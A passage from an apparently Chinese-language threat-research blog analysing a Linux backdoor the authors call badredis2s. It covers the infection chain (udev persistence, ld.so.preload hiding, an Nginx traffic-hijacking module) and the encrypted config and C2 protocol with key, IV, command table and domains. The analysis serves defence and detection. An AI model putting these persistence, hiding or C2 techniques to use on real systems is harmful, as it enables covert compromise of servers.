<p>&#x7136;&#x540E;download_init&#x5C1D;&#x8BD5;&#x4ECE;&#x88AB;&#x4FB5;&#x5165;&#x8BBE;&#x5907;&#x4E2D;&#x63D0;&#x9192;Nginx&#x670D;&#x52A1;&#x5668;&#x7684;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#xFF0C;&#x5305;&#x62EC;&#x7248;&#x672C;&#x53F7;&#xFF0C;&#x4EE5;&#x53CA;ngx_compat&#xFF0C;ngx_dav&#xFF0C;ngx_threads&#xFF0C;ngx_real_ip&#x7B49;&#x7F16;&#x8BD1;&#x914D;&#x7F6E;&#x53C2;&#x6570;&#xFF0C;&#x5E76;&#x4EE5;&#x6B64;&#x6784;&#x9020;&#x751F;&#x6210;register&#x8BF7;&#x6C42;&#xFF0C;&#x7528;&#x4E8E;&#x83B7;&#x5F97;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x8F7D;&#x8377;&#x7684;&#x4E0B;&#x8F7D;&#x5730;&#x5740;&#x3002;&#x8BE5;&#x8BF7;&#x6C42;&#x4F7F;&#x7528;&#x7684;URI&#x683C;&#x5F0F;&#x4E3A;/api/register/{hash}&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_register-1.png" alt="ring_register.png" loading="lazy"></p>
<p>C2&#x8FD4;&#x56DE;&#x7684;JSON&#x6570;&#x636E;&#x4E2D;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x5404;&#x4E2A;&#x8F7D;&#x8377;&#x7684;&#x4E0B;&#x8F7D;&#x5730;&#x5740;&#xFF0C;download_init &#x4ECE;&#x4E2D;&#x63D0;&#x53D6; <code>hash</code> &#x5B57;&#x6BB5;&#xFF0C;&#x5E76;&#x4EE5;&#x6B64;&#x5B8C;&#x6210;&#x6574;&#x4E2A;&#x611F;&#x67D3;&#x6D41;&#x7A0B;&#x7684;&#x95ED;&#x73AF;&#x3002;&#x5177;&#x4F53;&#x6B65;&#x9AA4;&#x5305;&#x62EC;&#xFF1A;&#x9996;&#x5148;&#xFF0C;&#x5728; <code>/var/adm</code> &#x76EE;&#x5F55;&#x4E0B;&#x521B;&#x5EFA;&#x4EE5;&#x8BE5; hash &#x547D;&#x540D;&#x7684;&#x6587;&#x4EF6;&#x5939;&#xFF0C;&#x7528;&#x4E8E;&#x5B58;&#x50A8;&#x4E0B;&#x8F7D;&#x7684;&#x6076;&#x610F;&#x8F7D;&#x8377;&#xFF1B;&#x63A5;&#x7740;&#xFF0C;&#x5C06; <code>udev_rules</code> &#x6587;&#x4EF6;&#x690D;&#x5165;&#x7CFB;&#x7EDF;&#x89C4;&#x5219;&#x76EE;&#x5F55; /etc/udev/rules.d&#xFF0C;&#x547D;&#x540D;&#x4E3A; <code>99-{hash}.rules</code>&#xFF0C;&#x4EE5;&#x5B9E;&#x73B0;&#x7CFB;&#x7EDF;&#x91CD;&#x542F;&#x540E;&#x7684;&#x6301;&#x4E45;&#x5316;&#x81EA;&#x542F;&#x52A8;&#xFF1B;&#x968F;&#x540E;&#xFF0C;&#x5C06;kernel.so&#x91CD;&#x547D;&#x540D;&#x4E3A;<code>libutilkeybd.so</code>&#xFF0C;&#x5E76;&#x5C06;&#x5176;&#x8DEF;&#x5F84;&#x5199;&#x5230; /etc/ld.so.preload&#xFF0C;&#x901A;&#x8FC7;&#x7CFB;&#x7EDF;&#x9884;&#x52A0;&#x8F7D;&#x673A;&#x5236;&#x6765;&#x9690;&#x85CF;&#x6076;&#x610F;&#x8FDB;&#x7A0B;&#x7684;&#x6D3B;&#x52A8;&#x75D5;&#x8FF9;&#xFF1B;&#x6700;&#x540E;&#xFF0C;&#x542F;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5757; <code>office_bin</code>&#xFF0C;&#x7EF4;&#x6301;&#x5BF9;&#x53D7;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x7684;&#x6301;&#x7EED;&#x63A7;&#x5236;&#xFF0C;&#x5E76;&#x91CD;&#x542F; Nginx &#x8FDB;&#x7A0B;&#x4EE5;&#x52A8;&#x6001;&#x52A0;&#x8F7D; <code>module.so</code> &#x6A21;&#x5757;&#xFF0C;&#x5C06;&#x7279;&#x5B9A;&#x6761;&#x4EF6;&#x7684;&#x8BBF;&#x95EE;&#x6D41;&#x91CF;&#x52AB;&#x6301;&#x81F3;&#x8272;&#x60C5;&#x6216;&#x535A;&#x5F69;&#x7F51;&#x7AD9;&#xFF0C;&#x5B8C;&#x6210;&#x6240;&#x6709;&#x7684;&#x8F7D;&#x8377;&#x90E8;&#x7F72;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_payloads.png" alt="ring_payloads.png" loading="lazy"></p>
<h2 id="0x3-officebin">0x3: office_bin</h2>
<p>office_bin&#x662F;&#x4E00;&#x4E2A;&#x914D;&#x7F6E;&#x7075;&#x6CD5;&#xFF0C;&#x9AD8;&#x5EA6;&#x6A21;&#x5757;&#x5316;/&#x63D2;&#x4EF6;&#x5316;&#xFF0C;&#x4F7F;&#x7528;AES&#x52A0;&#x5BC6;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x7684;&#x540E;&#x95E8;&#x6728;&#x9A6C;&#x3002;&#x57FA;&#x4E8E;&#x6837;&#x672C;&#x8FDB;&#x884C;&#x65F6;&#x4F1A;&#x8F93;&#x51FA;&#x4FE1;&#x606F;&#x5927;&#x91CF;&#x4F7F;&#x7528;redis2s&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5B83;&#x547D;&#x540D;&#x4E3A;badredis2s&#xFF0C;&#x5B83;&#x7531;Dropper,Client,Plugin 3&#x5927;&#x90E8;&#x5206;&#x7EC4;&#x6210;&#xFF0C;&#x56E0;&#x4E3A;&#x6CA1;&#x6709;stripped&#x7684;&#x7F18;&#x6545;&#xFF0C;&#x5728;&#x9006;&#x5411;&#x5206;&#x6790;&#x4E0A;&#x5E76;&#x6CA1;&#x6709;&#x96BE;&#x5EA6;&#xFF0C;&#x529F;&#x80FD;&#x4E00;&#x76EE;&#x4E86;&#x7136;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_badredis.png" alt="ring_badredis.png" loading="lazy"></p>
<p>&#x5148;&#x8BF4;Dropper&#xFF0C;&#x672C;&#x6587;&#x9009;&#x53D6;&#x4EE5;&#x4E0B;&#x6837;&#x672C;&#x505A;&#x4E3A;&#x4E3B;&#x8981;&#x5206;&#x6790;&#x5BF9;&#x8C61;</p>
<pre><code>MD5: 79c492bfd8a35039249bacc6a31d7122
MAGIC: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
Packer: None
</code></pre>
<p>&#x5B83;&#x7684;&#x4E3B;&#x8981;&#x76EE;&#x7684;&#x662F;&#x52A0;&#x8F7D;&#x5185;&#x5D4C;&#x7684;ELF&#xFF0C;&#x6267;&#x884C;&#x5176;&#x5BFC;&#x51FA;&#x51FD;&#x6570;<strong>kernel_module_entry</strong>&#xFF0C;&#x53C2;&#x6570;&#x4E3A;config_base64&#xFF0C;&#x5B83;&#x6307;&#x5411;&#x7684;&#x52A0;&#x5BC6;&#x7684;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_dropper.png" alt="ring_dropper.png" loading="lazy"></p>
<p>&#x518D;&#x6765;&#x770B;Client&#xFF0C;&#x4E0A;&#x8FF0;Dropper&#x91CA;&#x653E;&#x7684;&#x6587;&#x4EF6;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;</p>
<pre><code>MD5:ae0de7034c4866556675740f6647bfcc
MAGIC:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>Client&#x7684;&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x8BBE;&#x8BA1;&#x7B80;&#x6D01;&#x800C;&#x9AD8;&#x6548;&#xFF1A;&#x9996;&#x5148;&#x5BF9;&#x52A0;&#x5BC6;&#x914D;&#x7F6E;&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#xFF0C;&#x4ECE;&#x4E2D;&#x63D0;&#x53D6;C2&#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#x3001;&#x4EFB;&#x52A1;&#x6267;&#x884C;&#x65F6;&#x95F4;&#x7B56;&#x7565;&#x53CA;&#x901A;&#x4FE1;&#x5BC6;&#x94A5;&#x7B49;&#x5173;&#x952E;&#x53C2;&#x6570;&#x3002;&#x5F53;&#x7CFB;&#x7EDF;&#x65F6;&#x95F4;&#x7B26;&#x5408;&#x9884;&#x8BBE;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;&#x65F6;&#xFF0C;&#x5BA2;&#x6237;&#x7AEF;&#x5373;&#x5C1D;&#x8BD5;&#x4E0E;C2&#x670D;&#x52A1;&#x5668;&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#x901A;&#x9053;&#xFF0C;&#x7B49;&#x5F85;&#x63A5;&#x6536;&#x5E76;&#x6267;&#x884C;&#x8FDC;&#x7A0B;&#x6307;&#x4EE4;&#x3002;&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;&#x8BE5;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5728;<code>C2&#x83B7;&#x53D6;&#xFF0C;&#x7F51;&#x7EDC;&#x4F20;&#x8F93;</code>&#x65B9;&#x9762;&#x90FD;&#x91C7;&#x7528;&#x4E86;&#x4E24;&#x5C42;&#x5197;&#x4F59;&#x673A;&#x5236;&#x4EE5;&#x589E;&#x5F3A;&#x5065;&#x58EE;&#x6027;&#xFF1A;</p>
<p><strong>&#xFF08;1&#xFF09;C2 &#x83B7;&#x53D6;&#x673A;&#x5236;</strong></p>
<ul>
<li>&#x4F18;&#x5148;&#x4ECE;Microsoft Aure Blob&#x5B58;&#x50A8;&#x670D;&#x52A1;&#x52A8;&#x6001;&#x83B7;&#x53D6;&#x6700;&#x65B0;&#x7684;C2&#x5730;&#x5740;</li>
<li>&#x82E5;&#x4E91;&#x7AEF;&#x83B7;&#x53D6;&#x5931;&#x8D25;&#xFF0C;&#x5219;&#x81EA;&#x52A8;&#x56DE;&#x9000;&#x81F3;&#x5185;&#x7F6E;&#x7684;&#x786C;&#x7F16;&#x7801;C2&#x5730;&#x5740;</li>
</ul>
<p><strong>&#xFF08;2&#xFF09;&#x7F51;&#x7EDC;&#x4F20;&#x8F93;&#x673A;&#x5236;</strong></p>
<ul>
<li>&#x9996;&#x9009;&#x901A;&#x8FC7;WebSocket over TLS&#xFF08;wss&#xFF09;&#x52A0;&#x5BC6;&#x901A;&#x9053;&#x8FDB;&#x884C;&#x901A;&#x4FE1;</li>
<li>&#x5F53;wss&#x8FDE;&#x63A5;&#x56E0;&#x9632;&#x706B;&#x5899;&#x963B;&#x65AD;&#x6216;&#x7F51;&#x7EDC;&#x9650;&#x5236;&#x800C;&#x5931;&#x8D25;&#x65F6;&#xFF0C;&#x5207;&#x6362;&#x81F3;DNS&#x96A7;&#x9053;&#x6280;&#x672F;&#x4F5C;&#x4E3A;&#x5907;&#x9009;&#x4F20;&#x8F93;&#x65B9;&#x6848;</li>
</ul>
<p>&#x4E0B;&#x6587;&#x5C06;&#x4ECE;&#x914D;&#x7F6E;&#x89E3;&#x5BC6;&#xFF0C;C2&#x83B7;&#x53D6;&#xFF0C;&#x65F6;&#x95F4;&#x6821;&#x9A8C;&#xFF0C;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x7B49;&#x65B9;&#x9762;&#xFF0C;&#x5256;&#x6790;Client&#x7684;&#x6280;&#x672F;&#x5B9E;&#x73B0;&#x3002;</p>
<h4 id="%E2%91%A0-%E8%A7%A3%E5%AF%86%E9%85%8D%E7%BD%AE">&#x2460; &#x89E3;&#x5BC6;&#x914D;&#x7F6E;</h4>
<p>&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x4F7F;&#x7528;&#x4E86;&#x7B80;&#x5355;&#x7684;&quot;xor + base64&quot;&#x7684;&#x4FDD;&#x62A4;&#x65B9;&#x5F0F;&#xFF0C;base64&#x4F7F;&#x7528;&#x539F;&#x751F;&#x7684;&#x5B57;&#x6BCD;&#x8868;&#xFF0C;xor &#x5BC6;&#x94A5;&#x4E3A;0x23&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_config.png" alt="ring_config.png" loading="lazy"></p>
<p>&#x89E3;&#x5BC6;&#x540E;&#x7684;Config&#x4E2D;&#x6DB5;&#x76D6;C2&#xFF0C;&#x65F6;&#x95F4;&#x89C4;&#x5219;&#xFF0C;AES&#x5BC6;&#x94A5;&#xFF0C;&#x521D;&#x59CB;&#x5411;&#x91CF;&#x7B49;&#x4FE1;&#x606F;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_decryptconfig.png" alt="ring_decryptconfig.png" loading="lazy"></p>
<h4 id="%E2%91%A1-c2%E8%8E%B7%E5%8F%96">&#x2461; C2&#x83B7;&#x53D6;</h4>
<p>Config&#x7684;&#x524D;250&#x5B57;&#x8282;&#x4E3A;&#x4E3B;C2&#x7684;&#x4E91;&#x7AEF;&#x914D;&#x7F6E;&#x5730;&#x5740;&#xFF0C;&#x63A5;&#x7740;&#x7684;278&#x5B57;&#x8282;&#x4E3A;&#x5907;&#x7528;C2&#xFF0C;&#x4E3B;C2&#x9700;&#x8981;&#x901A;&#x8FC7;&#x4E91;&#x7AEF;&#x914D;&#x7F6E;&#x52A8;&#x6001;&#x83B7;&#x5F97;&#xFF0C;&#x800C;&#x5907;&#x7528;C2&#x5219;&#x662F;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x4F7F;&#x7528;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_c2.png" alt="ring_c2.png" loading="lazy"></p>
<p>&#x8BBF;&#x95EE;&#x4E3B;C2&#x7684;&#x4E91;&#x7AEF;&#x914D;&#x7F6E;&#x5730;&#x5740;&#xFF0C;&#x4F1A;&#x770B;&#x5230;&#x4E00;&#x4E2A;IIS LOGO&#x9875;&#x9762;&#xFF0C;&#x770B;&#x4F3C;&#x4E00;&#x5207;&#x6B63;&#x5E38;&#xFF0C;&#x5176;&#x5B9E;&#x7384;&#x673A;&#x9690;&#x85CF;&#x5728;&#x7F51;&#x9875;&#x6E90;&#x7801; <code> RequestID:/#$*SRUNT0pNVltHSlBXUUwNTUZXGRcXEA==*#$/</code>&#x90E8;&#x5206;&#xFF0C;Client&#x901A;&#x8FC7;&#x6B63;&#x5219;&#x8868;&#x8FBE;&#x5F0F;<code>\\s*/#\\$\\*.*?\\*#\\$/</code>&#x63D0;&#x53D6;SRUNT0pNVltHSlBXUUwNTUZXGRcXEA==&#xFF0C;&#x5B83;&#x5176;&#x5B9E;&#x662F;&#x4E00;&#x4E2A;&#x52A0;&#x5BC6;&#x7684;C2&#x914D;&#x7F6E;&#xFF0C;&#x901A;&#x8FC7;base64&#x89E3;&#x7801;&#xFF0C; &#x5355;&#x5B57;&#x8282; xor 0x23&#x5373;&#x53EF;&#x5F97;&#x5230;C2 <code>j6.linuxdistro.net:443</code>&#xFF0C;&#x6B64;&#x5904;&#x548C;&#x5907;&#x7528;C2&#x662F;&#x4E00;&#x81F4;&#x7684;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_mainc2.png" alt="ring_mainc2.png" loading="lazy"></p>
<h4 id="%E2%91%A2-%E6%97%B6%E9%97%B4%E7%AA%97%E5%8F%A3%E6%A0%A1%E9%AA%8C">&#x2462; &#x65F6;&#x95F4;&#x7A97;&#x53E3;&#x6821;&#x9A8C;</h4>
<p>Client&#x901A;&#x8FC7; <code>time_for_connect</code> &#x51FD;&#x6570;&#x6765;&#x51B3;&#x5B9A;&#x662F;&#x5426;&#x5141;&#x8BB8;&#x5728;&#x5F53;&#x4E0B;&#x65F6;&#x95F4;&#x6267;&#x884C;&#x3002;&#x5176;&#x673A;&#x5236;&#x662F;&#x4ECE;&#x914D;&#x7F6E;&#x6570;&#x636E;&#x7684;&#x56FA;&#x5B9A;&#x504F;&#x79FB;&#x91CF;&#xFF08;&#x5C0F;&#x65F6;&#x5217;&#x8868;&#x8D77;&#x59CB;&#x4E8E;0x210&#x5B57;&#x8282;&#xFF0C;&#x5206;&#x949F;&#x5217;&#x8868;&#x8D77;&#x59CB;&#x4E8E;0x270&#x5B57;&#x8282;&#xFF09;&#x8BFB;&#x53D6;&#x65F6;&#x95F4;&#x767D;&#x540D;&#x5355;&#xFF0C;&#x5E76;&#x4E0E;&#x5F53;&#x524D;&#x7CFB;&#x7EDF;&#x65F6;&#x95F4;&#x8FDB;&#x884C;&#x5339;&#x914D;&#x3002;&#x4E0D;&#x8FC7;&#xFF0C;&#x6839;&#x636E;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x914D;&#x7F6E;&#x663E;&#x793A;&#xFF0C;&#x8BE5;&#x7B56;&#x7565;&#x5F53;&#x524D;&#x8BBE;&#x7F6E;&#x4E3A;&#x5168;&#x5929;&#x5019;&#x5141;&#x8BB8;&#xFF0C;&#x5373;&#x5C0F;&#x65F6;&#xFF08;0-23&#xFF09;&#x548C;&#x5206;&#x949F;&#xFF08;0-59&#xFF09;&#x5747;&#x65E0;&#x9650;&#x5236;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_timerule.png" alt="ring_timerule.png" loading="lazy"></p>
<h4 id="%E2%91%A3-%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1">&#x2463; &#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h4>
<p>Client&#x5728;&#x901A;&#x4FE1;&#x5C42;&#x9762;&#x91C7;&#x7528; <strong>&#x201C;WSS &#x4F18;&#x5148;&#x3001;DNS Tunnel &#x515C;&#x5E95;&#x201D;</strong> &#x7684;&#x53CC;&#x901A;&#x9053;&#x7B56;&#x7565;&#xFF0C;&#x5E76;&#x901A;&#x8FC7;&#x7CBE;&#x7EC6;&#x7684;&#x65F6;&#x95F4;&#x63A7;&#x5236;&#x4E0E;&#x5931;&#x8D25;&#x8BA1;&#x6570;&#x673A;&#x5236;&#xFF0C;&#x5728;&#x4FDD;&#x8BC1; C2 &#x53EF;&#x8FBE;&#x6027;&#x7684;&#x540C;&#x65F6;&#xFF0C;&#x5C3D;&#x91CF;&#x7EF4;&#x6301;&#x4E0E;&#x6B63;&#x5E38;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x4E00;&#x81F4;&#x7684;&#x884C;&#x4E3A;&#x7279;&#x5F81;&#x3002;&#x5F53;&#x9AD8;&#x9690;&#x853D;&#x6027;&#x7684; WSS &#x901A;&#x4FE1;&#x53D7;&#x963B;&#x65F6;&#xFF0C;&#x6837;&#x672C;&#x4F1A;&#x5728;&#x9650;&#x5B9A;&#x65F6;&#x95F4;&#x5185;&#x5207;&#x6362;&#x81F3; DNS Tunnel&#xFF0C;&#x4EE5;&#x7EF4;&#x6301;&#x63A7;&#x5236;&#x901A;&#x9053;&#x7684;&#x8FDE;&#x7EED;&#x6027;&#xFF0C;&#x968F;&#x540E;&#x518D;&#x81EA;&#x52A8;&#x56DE;&#x9000;&#x81F3;&#x4E3B;&#x901A;&#x4FE1;&#x65B9;&#x5F0F;&#x3002;</p>
<p>&#x5BF9;&#x901A;&#x4FE1;&#x6570;&#x636E;&#x7684;&#x9006;&#x5411;&#x5206;&#x6790;&#x8868;&#x660E;&#xFF0C;WSS &#x901A;&#x9053;&#x5185;&#x7684;&#x5E94;&#x7528;&#x5C42;&#x6570;&#x636E;&#x9075;&#x5FAA;&#x201C;&#x538B;&#x7F29; &#x2192; &#x52A0;&#x5BC6;&#x201D;&#x7684;&#x5904;&#x7406;&#x6D41;&#x7A0B;&#xFF0C;&#x5177;&#x4F53;&#x4E3A; <strong>zlib &#x538B;&#x7F29; + AES-128-CBC &#x52A0;&#x5BC6;</strong>&#x3002;AES &#x5BC6;&#x94A5;&#x4ECE;&#x914D;&#x7F6E;&#x7ED3;&#x6784;&#x504F;&#x79FB; <strong>0x360</strong> &#x5904;&#x8BFB;&#x53D6;&#xFF08;16 &#x5B57;&#x8282;&#xFF09;&#xFF0C;&#x5BF9;&#x5E94;&#x7684; IV &#x4F4D;&#x4E8E; <strong>0x370</strong> &#x504F;&#x79FB;&#x5904;&#xFF08;16 &#x5B57;&#x8282;&#xFF09;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_configaes.png" alt="ring_configaes.png" loading="lazy"></p>
<p>&#x800C; DNS Tunnel &#x7684;&#x5B9E;&#x73B0;&#x57FA;&#x4E8E;&#x5F00;&#x6E90;&#x5DE5;&#x5177; <strong>iodine</strong>&#x3002;iodine &#x662F;&#x4E00;&#x79CD;&#x96A7;&#x9053;&#x5DE5;&#x5177;&#xFF0C;&#x901A;&#x8FC7;&#x5C06; IPv4 &#x6570;&#x636E;&#x5C01;&#x88C5;&#x5E76;&#x4F20;&#x8F93;&#x4E8E; DNS &#x8BF7;&#x6C42;&#x4E0E;&#x54CD;&#x5E94;&#x4E2D;&#xFF0C;&#x4ECE;&#x800C;&#x5728;&#x5E38;&#x89C4;&#x4E92;&#x8054;&#x7F51;&#x8BBF;&#x95EE;&#x88AB;&#x9632;&#x706B;&#x5899;&#x9650;&#x5236;&#x3001;&#x4F46;&#x4ECD;&#x5141;&#x8BB8; DNS &#x67E5;&#x8BE2;&#x7684;&#x7F51;&#x7EDC;&#x73AF;&#x5883;&#x4E0B;&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#x901A;&#x9053;&#x3002;&#x4E0E; iodine &#x76F8;&#x5173;&#x7684;&#x8FD0;&#x884C;&#x53C2;&#x6570;&#x5B58;&#x50A8;&#x4E8E;&#x6837;&#x672C;&#x914D;&#x7F6E;&#x6570;&#x636E;&#x504F;&#x79FB; 0x3E5 &#x5904;&#xFF0C;&#x5176;&#x4E2D;&#x53EF;&#x89E3;&#x6790;&#x51FA;&#x4F7F;&#x7528;&#x7684; Name Server &#x4E3A; 8.8.8.8&#xFF0C;&#x5BF9;&#x5E94;&#x7684; Top Domain &#x4E3A; nsj6.linuxdistro.net&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_iodine.png" alt="ring_iodine.png" loading="lazy"></p>
<p>Client &#x5728;&#x63A5;&#x6536;&#x5230;&#x6765;&#x81EA; C2 &#x7684;&#x54CD;&#x5E94;&#x6570;&#x636E;&#x540E;&#xFF0C;&#x9996;&#x5148;&#x5BF9;&#x6570;&#x636E;&#x8FDB;&#x884C; AES &#x89E3;&#x5BC6;&#xFF0C;&#x968F;&#x540E;&#x6267;&#x884C; zlib &#x89E3;&#x538B;&#xFF0C;&#x6700;&#x7EC8;&#x5C06;&#x89E3;&#x6790;&#x540E;&#x7684;&#x660E;&#x6587;&#x6570;&#x636E;&#x4F20;&#x9012;&#x81F3; <code>kernel_on_message</code> &#x51FD;&#x6570;&#xFF0C;&#x5E76;&#x6839;&#x636E;&#x4E0D;&#x540C;&#x7684;&#x6307;&#x4EE4;&#x53F7;&#x6267;&#x884C;&#x76F8;&#x5E94;&#x7684;&#x529F;&#x80FD;&#x903B;&#x8F91;&#x3002;</p>
<table>
<thead>
<tr>
<th>Command ID</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x01</td>
<td>Upload Device Info</td>
</tr>
<tr>
<td>0x02</td>
<td>Reboot</td>
</tr>
<tr>
<td>0x03</td>
<td>Shutdown</td>
</tr>
<tr>
<td>0x04</td>
<td>Edig Comment in redis2s-client</td>
</tr>
<tr>
<td>0x06</td>
<td>Edit Group in redis2s-client</td>
</tr>
<tr>
<td>0x08</td>
<td>Restart Client</td>
</tr>
<tr>
<td>0x0a</td>
<td>module info</td>
</tr>
<tr>
<td>0x0c</td>
<td>module data</td>
</tr>
<tr>
<td>0x12</td>
<td>run module</td>
</tr>
<tr>
<td>0x13</td>
<td>exit client</td>
</tr>
<tr>
<td>0x17</td>
<td>uninstall client</td>
</tr>
<tr>
<td>0x18</td>
<td>send help info</td>
</tr>
<tr>
<td>0x19</td>
<td>&quot;put, get, ps&quot; cmd</td>
</tr>
<tr>
<td>0x21</td>
<td>save file</td>
</tr>
<tr>
<td>0x22</td>
<td>quantity_execute</td>
</tr>
</tbody>
</table>
<p>&#x63A5;&#x4E0B;&#x6765;&#x4EE5;&#x865A;&#x62DF;&#x673A;&#x4EA7;&#x751F;&#x7684;&#x5B9E;&#x9645;&#x6D41;&#x91CF;&#x6765;&#x8BF4;&#x660E;Client&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x7684;&#x62A5;&#x6587;&#x683C;&#x5F0F;&#xFF0C;wss&#x7684;&#x6D41;&#x91CF;&#x7ECF;&#x4E2D;&#x95F4;&#x4EBA;&#x52AB;&#x6301;&#x540E;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_wss.png" alt="ring_wss.png" loading="lazy"></p>
<p>&#x5148;&#x770B;C2&#x5411;Client&#x4E0B;&#x53D1;&#x7684;&#x7B2C;&#x4E00;&#x6761;&#x6307;&#x4EE4;&#xFF0C;&#x4F7F;&#x7528;AES CBC&#x89E3;&#x5BC6;&#xFF0C;&#x518D;&#x89E3;&#x538B;&#xFF0C;&#x5373;&#x53EF;&#x5F97;&#x5230;&#x660E;&#x6587;<code>01 01 00 00 00 00 04 00 00 00 01 00 00 00</code>&#x3002;Client&#x7684;&#x7F51;&#x7EDC;&#x62A5;&#x6587;&#x9075;&#x5FAA; &#x201C;1&#x5B57;&#x8282; flag + 4&#x5B57;&#x8282; cmd count + 1&#x5B57;&#x8282; type +4 &#x5B57;&#x8282;&#x7684; cmd1 length + 4 &#x5B57;&#x8282; cmd1&#x201D; &#x8FD9;&#x4E00;&#x683C;&#x5F0F;&#xFF0C;&#x660E;&#x6587;&#x6307;&#x4EE4;&#x89E3;&#x6790;&#x53EF;&#x77E5;&#xFF0C;&#x8FD9;&#x662F;0x00000001&#x6307;&#x4EE4;&#xFF0C;&#x5373;&#x8981;&#x6C42;&#x4E0A;&#x62A5;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x3002;&#x5BF9;&#x89E3;&#x5BC6;&#x6D41;&#x7A0B;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x53C2;&#x8003;&#x9644;&#x5F55;&#x4E2D;&#x7684;CyberChef&#x3002;</p>
<pre><code>#AES KEY: 2B990667D0E087AE
#AES IV:  27FAD11C481BD789

# CipherText

00000000  0e 1d 85 54 28 12 fb f2 9a 3c dd 02 6c 83 ed f9  |...T(.&#xFB;&#xF2;.&lt;&#xDD;.l.&#xED;&#xF9;|
00000010  87 3d 0d 46 1c 94 9d 46 26 55 5c 2a 9a 72 1c aa  |.=.F...F&amp;U\*.r.&#xAA;|

#PlainText

00000000  01 01 00 00 00 00 04 00 00 00 01 00 00 00        |..............|
flag:1
cmd count: 1
type: 0
cmd1 length:4
cmd1: 0x00000001

</code></pre>
<p>&#x8BFB;&#x8005;&#x5982;&#x679C;&#x5C1D;&#x8BD5;&#x7528;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x7684;CyberChef&#x53BB;&#x89E3;&#x5BC6;C2&#x4E0B;&#x53D1;&#x7684;&#x7B2C;&#x4E8C;&#x6761;&#x6307;&#x4EE4;&#xFF0C;&#x4F1A;&#x53D1;&#x73B0;&#x89E3;&#x5BC6;&#x5931;&#x8D25;&#x3002;&#x539F;&#x56E0;&#x662F;&#x4E0D;&#x540C;&#x4E8E;&#x4E00;&#x822C;&#x7684;AES CBC&#x6A21;&#x5F0F;&#xFF0C;Badredis2s&#x4F7F;&#x7528;&#x662F;&#x6240;&#x8C13;&#x7684;<strong>AES-CBC with chained IV</strong>&#xFF0C;&#x5373;&#x6BCF;&#x6761;&#x6D88;&#x606F;&#x7684;IV&#x662F;&#x524D;&#x4E00;&#x6761;&#x6D88;&#x606F;&#x7684;&#x6700;&#x540E;&#x4E00;&#x4E2A;&#x5BC6;&#x6587;&#x5757;&#x3002;&#x56E0;&#x6B64;&#x8981;&#x60F3;&#x89E3;&#x5BC6;&#x7B2C;&#x4E8C;&#x6761;&#x6307;&#x4EE4;&#xFF0C;IV&#x9700;&#x8981;&#x8BBE;&#x7F6E;&#x4E3A;&#x7B2C;&#x4E00;&#x6307;&#x4EE4;&#x7684;&#x6700;&#x540E;16&#x5B57;&#x8282; <code>87 3d 0d 46 1c 94 9d 46  26 55 5c 2a 9a 72 1c aa</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_chainiv.png" alt="ring_chainiv.png" loading="lazy"></p>
